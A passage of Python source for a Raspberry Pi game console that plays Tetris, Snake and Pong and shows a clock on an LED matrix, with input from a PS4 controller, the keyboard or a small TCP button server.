TEXTSHADOWCOLOR = GRAY
COLORS = (BLUE,GREEN,RED,YELLOW,CYAN,MAGENTA,ORANGE)
LIGHTCOLORS = (LIGHTBLUE, LIGHTGREEN, LIGHTRED, LIGHTYELLOW)
#assert len(COLORS) == len(LIGHTCOLORS) # each color must have light color
# constants defining the keys/buttons on the controller
BUTTON_LEFT=0
BUTTON_RIGHT=1
BUTTON_UP=2
BUTTON_DOWN=3
BUTTON_BLUE=4
BUTTON_GREEN=5
BUTTON_RED=6
BUTTON_YELLOW=7
# Sony PS4 Controller Codes
# using evdev now; should be better to use pygame.joystick, but could not get this to work in the headless setup
PS4BTN_X=304
PS4BTN_CIRCLE=305
PS4BTN_TRIANGLE=307
PS4BTN_QUADRAT=308
PS4BTN_R2=313
PS4BTN_R1=311
PS4BTN_L2=312
PS4BTN_L1=310
#maps the evdev button code to the in-game button event name
# Ps4 Version --> maps an PS4 Button to the in-game event name
# using predfined constants from evdev
if PI:
# controllerEventMapper = {
# BTN_SOUTH : BUTTON_DOWN,
# BTN_EAST : BUTTON_RIGHT,
# BTN_WEST : BUTTON_LEFT,
# BTN_NORTH: BUTTON_UP,
# BTN_TL : BUTTON_YELLOW,
# BTN_TL2 : BUTTON_RED,
# BTN_TR : BUTTON_GREEN,
# BTN_TR2 : BUTTON_BLUE
# }
controllerEventMapper = {
PS4BTN_X : BUTTON_DOWN,
PS4BTN_CIRCLE : BUTTON_RIGHT,
PS4BTN_QUADRAT : BUTTON_LEFT,
PS4BTN_TRIANGLE : BUTTON_UP,
PS4BTN_L1 : BUTTON_YELLOW,
PS4BTN_L2 : BUTTON_RED,
PS4BTN_R1 : BUTTON_GREEN,
PS4BTN_R2 : BUTTON_BLUE
}
keyboardEventMapper = {
pygame.K_DOWN : BUTTON_DOWN,
pygame.K_RIGHT : BUTTON_RIGHT,
pygame.K_LEFT : BUTTON_LEFT,
pygame.K_UP: BUTTON_UP,
pygame.K_4 : BUTTON_YELLOW,
pygame.K_3 : BUTTON_RED,
pygame.K_2 : BUTTON_GREEN,
pygame.K_1 : BUTTON_BLUE
}
#constants for the communication with the external display driver (Arduino) - only 4 commands are currently used
#COMMANDBYTE_SETBRIGHTNESS = 22 # command to set the LED Brightness of the Main Display; Followed by 1 Byte: Brightness value
COMMANDBYTE_DRAWPIXELRGB = 24 # command to set a pixel to a RGB color; followed by 5 byte: X-pos, Y-pos, R-Value, G-Value, B-Value
COMMANDBYTE_DRAWPIXELCOLOR = 26 # command to set a pixel to a RGB color, selected from internal palet; followed by 3 byte: X-pos, Y-pos, Color-Index
#COMMANDBYTE_FULLSCREEN = 28 # command to set the full screen, followed by 200 bytes for each pixel, selected from internal pallet
COMMANDBYTE_UPDATESCREEN = 30 # command to update the screen
COMMANDBYTE_CLEARSCREEN = 32 # command to clear the screen
# constants for the colors in the arduino matrix
COLORINDEX_BLUE = 0
COLORINDEX_GREEN = 1
COLORINDEX_RED = 2
COLORINDEX_YELLOW = 3
COLORINDEX_CYAN = 4
COLORINDEX_MAGENTA = 5
COLORINDEX_ORANGE = 6
COLORINDEX_WHITE = 7
COLORINDEX_BLACK = 8
TEMPLATEWIDTH = 5
TEMPLATEHEIGHT = 5
S_SHAPE_TEMPLATE = [['.....',
'.....',
'..OO.',
'.OO..',
'.....'],
['.....',
'..O..',
'..OO.',
'...O.',
'.....']]
Z_SHAPE_TEMPLATE = [['.....',
'.....',
'.OO..',
'..OO.',
'.....'],
['.....',
'..O..',
'.OO..',
'.O...',
'.....']]
I_SHAPE_TEMPLATE = [['..O..',
'..O..',
'..O..',
'..O..',
'.....'],
['.....',
'.....',
'OOOO.',
'.....',
'.....']]
O_SHAPE_TEMPLATE = [['.....',
'.....',
'.OO..',
'.OO..',
'.....']]
J_SHAPE_TEMPLATE = [['.....',
'.O...',
'.OOO.',
'.....',
'.....'],
['.....',
'..OO.',
'..O..',
'..O..',
'.....'],
['.....',
'.....',
'.OOO.',
'...O.',
'.....'],
['.....',
'..O..',
'..O..',
'.OO..',
'.....']]
L_SHAPE_TEMPLATE = [['.....',
'...O.',
'.OOO.',
'.....',
'.....'],
['.....',
'..O..',
'..O..',
'..OO.',
'.....'],
['.....',
'.....',
'.OOO.',
'.O...',
'.....'],
['.....',
'.OO..',
'..O..',
'..O..',
'.....']]
T_SHAPE_TEMPLATE = [['.....',
'..O..',
'.OOO.',
'.....',
'.....'],
['.....',
'..O..',
'..OO.',
'..O..',
'.....'],
['.....',
'.....',
'.OOO.',
'..O..',
'.....'],
['.....',
'..O..',
'.OO..',
'..O..',
'.....']]
PIECES = {'S': S_SHAPE_TEMPLATE,
'Z': Z_SHAPE_TEMPLATE,
'I': I_SHAPE_TEMPLATE,
'J': J_SHAPE_TEMPLATE,
'L': L_SHAPE_TEMPLATE,
'O': O_SHAPE_TEMPLATE,
'T': T_SHAPE_TEMPLATE}
PIECES_ORDER = {'S': 0,'Z': 1,'I': 2,'J': 3,'L': 4,'O': 5,'T': 6}
# snake constants #
UP = 'up'
DOWN = 'down'
LEFT = 'left'
RIGHT = 'right'
HEAD = 0 # syntactic sugar: index of the worm's head
# font clock #
clock_font = [
0x1F, 0x11, 0x1F,
0x00, 0x00, 0x1F,
0x1D, 0x15, 0x17,
0x15, 0x15, 0x1F,
0x07, 0x04, 0x1F,
0x17, 0x15, 0x1D,
0x1F, 0x15, 0x1D,
0x01, 0x01, 0x1F,
0x1F, 0x15, 0x1F,
0x17, 0x15, 0x1F]
# serial port pi #
if PI:
serport=serial.Serial(PORT_NAME,baudrate=250000,timeout=3.0)
spiPort = spi(port=0, device=0, gpio=noop())
MAX2719device = max7219(spiPort, cascaded=MAX2719_DISPLAYS, block_orientation=MAX2719_ORIENTATION,
rotate=MAX2719_ROTATION or 0, blocks_arranged_in_reverse_order=False)
#creates object 'gamepad' to store the data
#gamepad = InputDevice(GAMEPAD_DEVICE)
#print(gamepad)
else:
MAX2719device = 0
# key server for controller #
#TODO simply use pygame events?
QKEYDOWN=0
QKEYUP=1
myQueue = queue.Queue()
mask = bytearray([1,2,4,8,16,32,64,128])
class qEvent:
def __init__(self, key, type):
self.key = key
self.type = type
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
oldstr=b'\x80' #create event on connection start (0x80 != 0x00)
while RUNNING:
data = self.request.recv(1)
#cur_thread = threading.current_thread()
#response = bytes("{}: {}".format(cur_thread.name, data), 'ascii')
if data:
if data!=oldstr:
#print(str(time.time()) + ' -- ' + str(oldstr))
for i in range (0,8):
if (bytes(data[0]&mask[i])!=bytes(oldstr[0]&mask[i])) :
if (bytes(data[0]&mask[i])):
myQueue.put(qEvent(i,QKEYDOWN))
else:
myQueue.put(qEvent(i,QKEYUP))
oldstr = data
#print(data)
#self.request.sendall(response)
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
def client(ip, port, message):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
try:
sock.sendall(bytes(message, 'ascii'))
response = str(sock.recv(1024), 'ascii')
print("Received: {}".format(response))
finally:
sock.close()
# returns the first device that does not contain Touchpad or motion (PS4)
def findController():
for fname in evdev.list_devices():
dev = evdev.InputDevice(fname)
print(dev.name)
if "Touchpad" in dev.name:
next
elif "Motion Sensor" in dev.name:
next
else:
return dev
def gamePadListener():
gamePadConnected = False
while True:
if gamePadConnected==False:
gamepad = findController()
if(gamepad):
print(gamepad)
gamePadConnected=True
else:
time.sleep(0.5)
else: # gamepad is available --> read it
r,w,x = select([gamepad], [], [],0)
if r:
try:
for event in gamepad.read():
#filters by event type
if event.type == ecodes.EV_KEY:
#print(event)
if event.value == 1: # button pressed
thisEventType = QKEYDOWN
else:
thisEventType = QKEYUP
# try to get the correct key mapping
mappedEventCode = controllerEventMapper.get(event.code,-1)
if mappedEventCode != -1: # only insert when button has a mapping
myQueue.put(qEvent(mappedEventCode,thisEventType))
except OSError:
time.sleep(0.5)
gamePadConnected=False
continue
time.sleep(0.01)
def pollKeyboardInput():
for event in pygame.event.get():
#if event.type == pygame.QUIT: # Usually wise to be able to close your program.
# raise SystemExit
if event.type == pygame.KEYDOWN or event.type == pygame.KEYUP:
if event.type == pygame.KEYDOWN:
thisEventType = QKEYDOWN
else:
thisEventType = QKEYUP
mappedEventCode = keyboardEventMapper.get(event.key,-1)
if mappedEventCode != -1: # only insert when button has a mapping
myQueue.put(qEvent(mappedEventCode,thisEventType))
# main #
SCREEN_CLOCK = 0
SCREEN_TETRIS = 1
SCREEN_SNAKE = 2
SCREEN_PONG = 3
def main():
global FPSCLOCK, DISPLAYSURF, BASICFONT, BIGFONT
global RUNNING
RUNNING=True
if not PI:
pygame.init()
FPSCLOCK = pygame.time.Clock()
DISPLAYSURF = pygame.display.set_mode((PIXEL_X*SIZE, PIXEL_Y*SIZE))
BASICFONT = pygame.font.Font('freesansbold.ttf', 18)
BIGFONT = pygame.font.Font('freesansbold.ttf', 100)
pygame.display.set_caption('Pi Games')
else:
#MAX2719device.brightness(1) TODO needs fix
MAX2719device.clear()
#MAX2719device.show_message("Waiting for controller...", font=proportional(CP437_FONT),delay=0.015)
gamePadThread = threading.Thread(target=gamePadListener,daemon=True)
gamePadThread.start()
# Port 0 means to select an arbitrary unused port
HOST, PORT = '', 4711
server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
ip, port = server.server_address
# Start a thread with the server -- that thread will then start one
# more thread for each request
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
print("Server loop running in thread:", server_thread.name)
currentScreen = SCREEN_TETRIS
#nextScreen = -1
clearScreen()
drawClock(COLORINDEX_GREEN)
clearScreen()
# if PI:
# show_message(MAX2719device, "Let's play", fill="white", font=proportional(CP437_FONT),scroll_delay=0.03)
while True:
updateStartScreen(currentScreen)
while myQueue.empty():
if not PI:
pollKeyboardInput()
time.sleep(.1)
updateScreen()
if not PI:
checkForQuit()
time.sleep(.1)
# use the down key as enter and right, left to toggle between start screens
event = myQueue.get()
if event.type == QKEYDOWN:
if (event.key == BUTTON_LEFT): # goto previous start screen
currentScreen-=1
if(currentScreen==0):
currentScreen=3
elif (event.key == BUTTON_RIGHT): # goto next start screen
currentScreen+=1
if(currentScreen==4):
currentScreen=1
elif (event.key == BUTTON_DOWN): # start a game
if(currentScreen==SCREEN_TETRIS):
runTetrisGame()
drawGameOverScreen()
elif(currentScreen==SCREEN_PONG):
runPongGame()
drawGameOverScreen()
elif(currentScreen==SCREEN_SNAKE):
runSnakeGame()
drawGameOverScreen()
elif (event.key == BUTTON_UP): # goto Clock
drawClock(COLORINDEX_GREEN)
terminate()
# gaming main routines #
def runPongGame():
down = 0
up = 1
left = 0
right = 1
lowerbarx = PIXEL_X//2
upperbarx = PIXEL_X//2
score1 = 0
score2 = 0
ballx = PIXEL_X//2
bally = PIXEL_Y//2
directiony = down
directionx = left
movingRightUpper = False
movingLeftUpper = False
movingRightLower = False
movingLeftLower = False
restart=False
lastLowerMoveSidewaysTime = time.time()
lastUpperMoveSidewaysTime = time.time()
while True: # main game loop for pong
if not PI:
pollKeyboardInput()
while not myQueue.empty():
event = myQueue.get()
if event.type == QKEYDOWN:
if (event.key == 0):
movingLeftLower = True
movingRightLower = False
elif (event.key == 1):
movingLeftLower = False
movingRightLower = True
elif (event.key == BUTTON_YELLOW):
movingLeftUpper = True
movingRightUpper = False
elif (event.key == BUTTON_GREEN):
movingLeftUpper = False
movingRightUpper = True
elif event.key == BUTTON_RED:
return
if event.type == QKEYUP:
if (event.key == 0):
movingLeftLower =False
elif (event.key == 1):
movingRightLower = False
elif (event.key == BUTTON_YELLOW):
movingLeftUpper = False
elif (event.key == BUTTON_GREEN):
movingRightUpper = False
if (movingLeftLower) and time.time() - lastLowerMoveSidewaysTime > MOVESIDEWAYSFREQ:
if lowerbarx >1:
lowerbarx-=1
lastLowerMoveSidewaysTime = time.time()
if (movingRightLower) and time.time() - lastLowerMoveSidewaysTime > MOVESIDEWAYSFREQ:
if lowerbarx <PIXEL_X-2:
lowerbarx+=1
lastLowerMoveSidewaysTime = time.time()
if (movingLeftUpper) and time.time() - lastUpperMoveSidewaysTime > MOVESIDEWAYSFREQ:
if upperbarx >1:
upperbarx-=1
lastUpperMoveSidewaysTime = time.time()
if (movingRightUpper) and time.time() - lastUpperMoveSidewaysTime > MOVESIDEWAYSFREQ:
if upperbarx <PIXEL_X-2:
upperbarx+=1
lastUpperMoveSidewaysTime = time.time()
if not PI:
checkForQuit()
if (directiony == up):
if (bally>1):
bally-=1
else:
if (abs(ballx-upperbarx)<2):
directiony = down
if (ballx==upperbarx+1):
if (directionx==left):
directionx=right
if (ballx==upperbarx-1):
if (directionx==right):
directionx=left
elif ((ballx-upperbarx==2) and (directionx==left)):
directionx=right
directiony = down
elif ((ballx-upperbarx==-2) and (directionx==right)):
directionx=left
directiony = down
else:
bally-=1
score1+=1
restart = True
else:
if (bally<PIXEL_Y-2):
bally+=1
else:
if (abs(ballx-lowerbarx)<2):
directiony = up
if (ballx==lowerbarx+1):
if (directionx==left):
directionx=right
if (ballx==lowerbarx-1):
if (directionx==right):
directionx=left
elif ((ballx-lowerbarx==2) and (directionx==left)):
directionx=right
directiony = up
elif ((ballx-lowerbarx==-2) and (directionx==right)):
directionx=left
directiony = up
else:
bally+=1
score2+=1
restart = True
if (directionx == left):
if (ballx>0):
ballx-=1
else:
directionx = right
ballx+=1
if(directiony == up):
if(bally>2):
bally-=1
if(directiony == down):
if(bally<PIXEL_Y-2):
bally+=1
else:
if (ballx<PIXEL_X-1):
ballx+=random.randint(1,2)
else:
directionx = left
ballx-=random.randint(1,2)
if(directiony == up):
if(bally>3):
bally-=random.randint(0,2)
if(directiony == down):
if(bally<PIXEL_Y-3):
bally+=random.randint(0,2)
clearScreen()
drawBall(ballx,bally)
drawBar(upperbarx,0)
drawBar(lowerbarx,PIXEL_Y-1)
#twoscoreText(score1,score2)
updateScoreDisplayPong(score1,score2,MAX2719device)
updateScreen()
if (score1 == 9) or (score2 == 9):
time.sleep(3)
return
if restart:
time.sleep(1)
ballx=PIXEL_X//2
bally=PIXEL_Y//2
if directiony==down:
directiony = up
else:
directiony = down
restart=False
else:
time.sleep(.1)
def runSnakeGame():
# Set a random start point.
startx = random.randint(2, BOARDWIDTH-2 )
starty = random.randint(2, BOARDHEIGHT -2 )
wormCoords = [{'x': startx, 'y': starty},
{'x': startx - 1, 'y': starty},
{'x': startx - 2, 'y': starty}]
direction = RIGHT
score = 0
# Start the apple in a random place.
apple = getRandomLocation()
while True: # main game loop
if not PI:
pollKeyboardInput()
if not myQueue.empty():
event = myQueue.get()
# take only one input per run
while not myQueue.empty():
myQueue.get()
if event.type == QKEYDOWN:
if (event.key == 0) and direction != RIGHT:
direction = LEFT
elif (event.key == 1) and direction != LEFT:
direction = RIGHT
elif (event.key == 2) and direction != DOWN:
direction = UP
elif (event.key == 3) and direction != UP:
direction = DOWN
elif (event.key == BUTTON_RED):
return
# check if the worm has hit itself or the edge
if wormCoords[HEAD]['x'] == -1 or wormCoords[HEAD]['x'] == BOARDWIDTH or wormCoords[HEAD]['y'] == -1 or wormCoords[HEAD]['y'] == BOARDHEIGHT:
time.sleep(1.5)
return # game over
for wormBody in wormCoords[1:]:
if wormBody['x'] == wormCoords[HEAD]['x'] and wormBody['y'] == wormCoords[HEAD]['y']:
time.sleep(1.5)
return # game over
# check if worm has eaten an apple
if wormCoords[HEAD]['x'] == apple['x'] and wormCoords[HEAD]['y'] == apple['y']:
# don't remove worm's tail segment
score += 1
apple = getRandomLocation() # set a new apple somewhere
else:
del wormCoords[-1] # remove worm's tail segment
# move the worm by adding a segment in the direction it is moving
if direction == UP:
if wormCoords[HEAD]['y'] == 0 :
newHead = {'x': wormCoords[HEAD]['x'], 'y': BOARDHEIGHT-1}
else:
newHead = {'x': wormCoords[HEAD]['x'], 'y': wormCoords[HEAD]['y'] - 1}
elif direction == DOWN:
if wormCoords[HEAD]['y'] == BOARDHEIGHT-1 :
newHead = {'x': wormCoords[HEAD]['x'], 'y': 0}
else:
newHead = {'x': wormCoords[HEAD]['x'], 'y': wormCoords[HEAD]['y'] + 1}
elif direction == LEFT:
if wormCoords[HEAD]['x'] == 0 :
newHead = {'x': BOARDWIDTH -1, 'y': wormCoords[HEAD]['y'] }
else:
newHead = {'x': wormCoords[HEAD]['x'] - 1, 'y': wormCoords[HEAD]['y']}
elif direction == RIGHT:
if wormCoords[HEAD]['x'] == BOARDWIDTH-1:
newHead = {'x': 0, 'y': wormCoords[HEAD]['y']}
else:
newHead = {'x': wormCoords[HEAD]['x'] + 1, 'y': wormCoords[HEAD]['y']}
if not PI:
checkForQuit()
wormCoords.insert(0, newHead)
clearScreen()
drawWorm(wormCoords)
drawApple(apple)
updateScoreDisplaySnake(score,MAX2719device)
#scoreText(score)
updateScreen()
time.sleep(.15)
def runTetrisGame():
# setup variables for the start of the game
if PI:
#MAX2719device.brightness(1)
#MAX2719device.flush()
MAX2719device.clear()
board = getBlankBoard()
lastMoveDownTime = time.time()
lastMoveSidewaysTime = time.time()
lastFallTime = time.time()
movingDown = False # note: there is no movingUp variable
movingLeft = False
movingRight = False
score = 0
oldscore = -1
oldpiece = 10
lines = 0
level, fallFreq = calculateLevelAndFallFreq(lines)
fallingPiece = getNewPiece()
nextPiece = getNewPiece()
# tetris listens to the keys
# 0: Left --> move tile left
# 1: Right --> move tile right
# 2: Up --> rotate tile
# 3: Down --> move tile down
# 4: Button-Blue --> drop down
# 5: BUTTON_GREEN --> rotates in other direction
# 7: BUTTON_YELLOW --> ????
while True: # game loop
#if not myQueue.empty():
# print(myQueue.get().type)
if fallingPiece == None:
# No falling piece in play, so start a new piece at the top
fallingPiece = nextPiece
nextPiece = getNewPiece()
lastFallTime = time.time() # reset lastFallTime
if not isValidPosition(board, fallingPiece):
time.sleep(2)
return # can't fit a new piece on the board, so game over
if not PI:
pollKeyboardInput()
checkForQuit()
while not myQueue.empty():
event = myQueue.get()
if event.type == QKEYUP:
if (event.key == BUTTON_YELLOW):# TODO - what does this do?
lastFallTime = time.time()
lastMoveDownTime = time.time()
lastMoveSidewaysTime = time.time()
elif (event.key == BUTTON_LEFT):
movingLeft = False
elif (event.key == BUTTON_RIGHT):
movingRight = False
elif (event.key == BUTTON_DOWN):
movingDown = False
elif event.type == QKEYDOWN:
# moving the piece sideways
if (event.key == BUTTON_LEFT) and isValidPosition(board, fallingPiece, adjX=-1):
fallingPiece['x'] -= 1
movingLeft = True
movingRight = False
lastMoveSidewaysTime = time.time()
elif (event.key == BUTTON_RIGHT) and isValidPosition(board, fallingPiece, adjX=1):
fallingPiece['x'] += 1
movingRight = True
movingLeft = False
lastMoveSidewaysTime = time.time()
# rotating the piece (if there is room to rotate)
elif (event.key == BUTTON_UP):
fallingPiece['rotation'] = (fallingPiece['rotation'] + 1) % len(PIECES[fallingPiece['shape']])
if not isValidPosition(board, fallingPiece):
fallingPiece['rotation'] = (fallingPiece['rotation'] - 1) % len(PIECES[fallingPiece['shape']])
elif (event.key == BUTTON_GREEN): # rotate the other direction
fallingPiece['rotation'] = (fallingPiece['rotation'] - 1) % len(PIECES[fallingPiece['shape']])
if not isValidPosition(board, fallingPiece):
fallingPiece['rotation'] = (fallingPiece['rotation'] + 1) % len(PIECES[fallingPiece['shape']])
# making the piece fall faster with the down key
elif (event.key == BUTTON_DOWN):
movingDown = True
if isValidPosition(board, fallingPiece, adjY=1):
fallingPiece['y'] += 1
lastMoveDownTime = time.time()
# move the current piece all the way down
elif event.key == BUTTON_BLUE:
movingDown = False
movingLeft = False
movingRight = False
for i in range(1, BOARDHEIGHT):
if not isValidPosition(board, fallingPiece, adjY=i):
break
score+=i #TODO: more digits on numbercounter, more scores
fallingPiece['y'] += i - 1
# handle moving the piece because of user input
if (movingLeft or movingRight) and time.time() - lastMoveSidewaysTime > MOVESIDEWAYSFREQ:
if movingLeft and isValidPosition(board, fallingPiece, adjX=-1):
fallingPiece['x'] -= 1
elif movingRight and isValidPosition(board, fallingPiece, adjX=1):
fallingPiece['x'] += 1
lastMoveSidewaysTime = time.time()
if movingDown and time.time() - lastMoveDownTime > MOVEDOWNFREQ and isValidPosition(board, fallingPiece, adjY=1):
fallingPiece['y'] += 1
lastMoveDownTime = time.time()
# let the piece fall if it is time to fall
if time.time() - lastFallTime > fallFreq:
# see if the piece has landed
if not isValidPosition(board, fallingPiece, adjY=1):
# falling piece has landed, set it on the board
addToBoard(board, fallingPiece)
remLine = removeCompleteLines(board)
# count lines for level calculation
lines += remLine
# more lines, more points per line
score += SCORES[remLine]*level
level, fallFreq = calculateLevelAndFallFreq(lines)
fallingPiece = None
else:
# piece did not land, just move the piece down
fallingPiece['y'] += 1
lastFallTime = time.time()
# drawing everything on the screen
clearScreen()
drawBoard(board)
#scoreText(score)
if score>oldscore:
updateScoreDisplayTetris(score,level,PIECES_ORDER.get(nextPiece['shape']),MAX2719device)
oldscore = score
if oldpiece!=PIECES_ORDER.get(nextPiece['shape']):
updateScoreDisplayTetris(score,level,PIECES_ORDER.get(nextPiece['shape']),MAX2719device)
oldpiece=PIECES_ORDER.get(nextPiece['shape'])
#drawStatus(score, level)
#drawNextPiece(nextPiece)
if fallingPiece != None:
drawPiece(fallingPiece)
updateScreen()
#FPSCLOCK.tick(FPS)
time.sleep(.05)
def drawStartScreenTetris():
drawPixel(8,15,COLORINDEX_RED)
drawPixel(8,16,COLORINDEX_RED)
drawPixel(8,17,COLORINDEX_RED)
drawPixel(8,18,COLORINDEX_RED)
drawPixel(6,18,COLORINDEX_BLUE)
drawPixel(7,16,COLORINDEX_BLUE)
drawPixel(7,17,COLORINDEX_BLUE)
drawPixel(7,18,COLORINDEX_BLUE)
drawPixel(4,17,COLORINDEX_YELLOW)
drawPixel(3,18,COLORINDEX_YELLOW)
drawPixel(4,18,COLORINDEX_YELLOW)
drawPixel(5,18,COLORINDEX_YELLOW)
drawPixel(2,18,COLORINDEX_GREEN)
drawPixel(2,17,COLORINDEX_GREEN)
drawPixel(3,17,COLORINDEX_GREEN)
drawPixel(3,16,COLORINDEX_GREEN)
def drawStartScreenPong():
drawPixel(4,8,COLORINDEX_GREEN)
drawPixel(5,8,COLORINDEX_GREEN)
drawPixel(6,8,COLORINDEX_GREEN)
drawPixel(6,11,COLORINDEX_BLUE)
drawPixel(5,13,COLORINDEX_GREEN)
drawPixel(6,13,COLORINDEX_GREEN)
drawPixel(7,13,COLORINDEX_GREEN)
def drawStartScreenSnake():
drawPixel(5,3,COLORINDEX_RED)
drawPixel(6,3,COLORINDEX_GREEN)
drawPixel(7,3,COLORINDEX_GREEN)
drawPixel(8,3,COLORINDEX_GREEN)
drawPixel(8,2,COLORINDEX_GREEN)
drawPixel(8,1,COLORINDEX_GREEN)
# display the game over screen, show the points at end of game
def drawGameOverScreen():
while not myQueue.empty():
myQueue.get()
clearScreen()
#E
drawPixel(3,1,COLORINDEX_RED)
drawPixel(4,1,COLORINDEX_RED)
drawPixel(5,1,COLORINDEX_RED)
drawPixel(6,1,COLORINDEX_RED)
drawPixel(3,2,COLORINDEX_RED)
drawPixel(3,3,COLORINDEX_RED)
drawPixel(4,3,COLORINDEX_RED)
drawPixel(5,3,COLORINDEX_RED)
drawPixel(3,4,COLORINDEX_RED)
drawPixel(3,5,COLORINDEX_RED)
drawPixel(4,5,COLORINDEX_RED)
drawPixel(5,5,COLORINDEX_RED)
drawPixel(6,5,COLORINDEX_RED)
#N
drawPixel(3,7,COLORINDEX_RED)
drawPixel(3,8,COLORINDEX_RED)
drawPixel(3,9,COLORINDEX_RED)
drawPixel(3,10,COLORINDEX_RED)
drawPixel(3,11,COLORINDEX_RED)
drawPixel(4,8,COLORINDEX_RED)
drawPixel(5,9,COLORINDEX_RED)
drawPixel(6,7,COLORINDEX_RED)
drawPixel(6,8,COLORINDEX_RED)
drawPixel(6,9,COLORINDEX_RED)
drawPixel(6,10,COLORINDEX_RED)
drawPixel(6,11,COLORINDEX_RED)
#D
drawPixel(3,13,COLORINDEX_RED)
drawPixel(3,14,COLORINDEX_RED)
drawPixel(3,15,COLORINDEX_RED)
drawPixel(3,16,COLORINDEX_RED)
drawPixel(3,17,COLORINDEX_RED)
drawPixel(4,13,COLORINDEX_RED)
drawPixel(5,13,COLORINDEX_RED)
drawPixel(4,17,COLORINDEX_RED)
drawPixel(5,17,COLORINDEX_RED)
drawPixel(6,14,COLORINDEX_RED)
drawPixel(6,15,COLORINDEX_RED)
drawPixel(6,16,COLORINDEX_RED)
updateScreen()
time.sleep(0.5)
while True:
if not PI:
checkForQuit()
pollKeyboardInput()
while not myQueue.empty():
event = myQueue.get()
if event.type == QKEYDOWN:
if PI:
MAX2719device.clear()
return
def updateStartScreen(currentScreen):
clearScreen()
if currentScreen==SCREEN_TETRIS:
drawStartScreenTetris()
elif currentScreen==SCREEN_PONG:
drawStartScreenPong()
elif currentScreen==SCREEN_SNAKE:
drawStartScreenSnake()
def drawSymbols():
#snbake symbol
drawPixel(1,2,0)
drawPixel(2,2,0)
drawPixel(1,3,0)
drawPixel(1,4,0)
drawPixel(2,3,0)
drawPixel(2,4,0)
drawPixel(5,3,2)
drawPixel(6,3,1)
drawPixel(7,3,1)
drawPixel(8,3,1)
drawPixel(8,2,1)
drawPixel(8,1,1)
#pong symbol
drawPixel(1,9,2)
drawPixel(2,9,2)
drawPixel(1,10,2)
drawPixel(2,10,2)
drawPixel(1,11,2)
drawPixel(2,11,2)
drawPixel(5,9,1)
drawPixel(6,9,1)
drawPixel(7,9,1)
drawPixel(6,11,0)
#tetris symbol
drawPixel(1,16,3)
drawPixel(2,16,3)
drawPixel(1,17,3)
drawPixel(1,18,3)
drawPixel(2,17,3)
drawPixel(2,18,3)
drawPixel(7,16,0)
drawPixel(6,16,0)
drawPixel(6,17,0)
drawPixel(6,18,0)
#TODO separate drawing and control flow
#draws a clock on the main screen with or without seconds
#color -
def drawClock(color):
if PI:
MAX2719device.clear()
lastExecutiontime = time.localtime(0)
CLK_MODE_DEFAULT = 0 # 24h, no seconds
CLK_MODE_SECONDS =1 # 24h, with seconds
CLK_MODE_PARTY = 2 # Random Background
CLK_MODE_PARTYTIME = 3
clockMode = CLK_MODE_DEFAULT
while True:
if not PI:
pollKeyboardInput()
while not myQueue.empty():
event = myQueue.get()
if event.type == QKEYDOWN:
if event.key == BUTTON_RED: # toggle different clock modes
clockMode+=1
if clockMode==4:
clockMode=0
else:
return
if not PI:
checkForQuit()
now = time.localtime()
if (time.mktime(now)-time.mktime(lastExecutiontime)>0) :
hour = now.tm_hour
minute= now.tm_min
second= now.tm_sec
clearScreen()
if(clockMode==CLK_MODE_PARTY or clockMode==CLK_MODE_PARTYTIME):
#color=7
for x in range(PIXEL_X):
for y in range(PIXEL_Y):
drawPixelRgb(x,y,randint(0,255),randint(0,255), randint(0,255))
time.sleep(0.001) #TODO saw some data loss without a delay
if(clockMode==CLK_MODE_DEFAULT):
drawnumber(int(hour/10),2,3,color)
drawnumber(int(hour%10),6,3,color)
drawnumber(int(minute/10),2,10,color)
drawnumber(int(minute%10),6,10,color)
elif(clockMode==CLK_MODE_SECONDS):
drawnumber(int(hour/10),2,1,color)
drawnumber(int(hour%10),6,1,color)
drawnumber(int(minute/10),2,8,color)
drawnumber(int(minute%10),6,8,color)
drawnumber(int(second/10),2,15,color)
drawnumber(int(second%10),6,15,color)
elif(clockMode==CLK_MODE_PARTYTIME):
drawnumber(int(hour/10),2,1,8)
drawnumber(int(hour%10),6,1,8)
drawnumber(int(minute/10),2,8,8)
drawnumber(int(minute%10),6,8,8)
drawnumber(int(second/10),2,15,8)
drawnumber(int(second%10),6,15,8)
updateScreen()
time.sleep(.2)
def drawImage(filename):
im = Image.open(filename)
for row in range(0,BOARDHEIGHT):
for col in range(0,BOARDWIDTH):
r,g,b = im.getpixel((col,row))
drawPixelRgb(col,row,r,g,b)
updateScreen()
def drawHalfImage(filename,offset):
im = Image.open(filename)
if offset>10:
offset = 10
for row in range(0,10):
for col in range(0,10):
r,g,b = im.getpixel((col,row))
drawPixelRgb(col,row+offset,r,g,b)
# drawing #
def clearScreen():
if PI:
serport.write(bytearray([COMMANDBYTE_CLEARSCREEN]))
else:
DISPLAYSURF.fill(BGCOLOR)
def updateScreen():
if PI:
serport.write(bytearray([COMMANDBYTE_UPDATESCREEN]))
else:
pygame.display.update()
def drawPixel(x,y,color):
if color == BLANK:
return
if PI:
if (x>=0 and y>=0 and color >=0):
serport.write(bytearray([COMMANDBYTE_DRAWPIXELCOLOR,x,y,color]))
else:
pygame.draw.rect(DISPLAYSURF, COLORS[color], (x*SIZE+1, y*SIZE+1, SIZE-2, SIZE-2))
def drawPixelRgb(x,y,r,g,b):
if PI:
if (x>=0 and y>=0):
serport.write(bytearray([COMMANDBYTE_DRAWPIXELRGB,x,y,r,g,b]))
else:
pygame.draw.rect(DISPLAYSURF, (r,g,b), (x*SIZE+1, y*SIZE+1, SIZE-2, SIZE-2))
def drawnumber(number,offsetx,offsety,color):
for x in range(0,3):
for y in range(0,5):
if clock_font[3*number + x]&mask[y]:
drawPixel(offsetx+x,offsety+y,color)
def makeTextObjs(text, font, color):
surf = font.render(text, True, color)
return surf, surf.get_rect()
def scrollText(text):
if PI:
show_message(MAX2719device, text, fill="white", font=proportional(CP437_FONT))
#MAX2719device.show_message(text, font=proportional(CP437_FONT))
else:
titleSurf, titleRect = makeTextObjs(str(text), BASICFONT, TEXTCOLOR)
titleRect.center = (int(WINDOWWIDTH / 2) - 3, int(WINDOWHEIGHT / 2) - 3)
DISPLAYSURF.blit(titleSurf, titleRect)
# inserts a colon on the MAX7219 secondary display
# x - x coordinate on the display (0,0) is the left upper corner
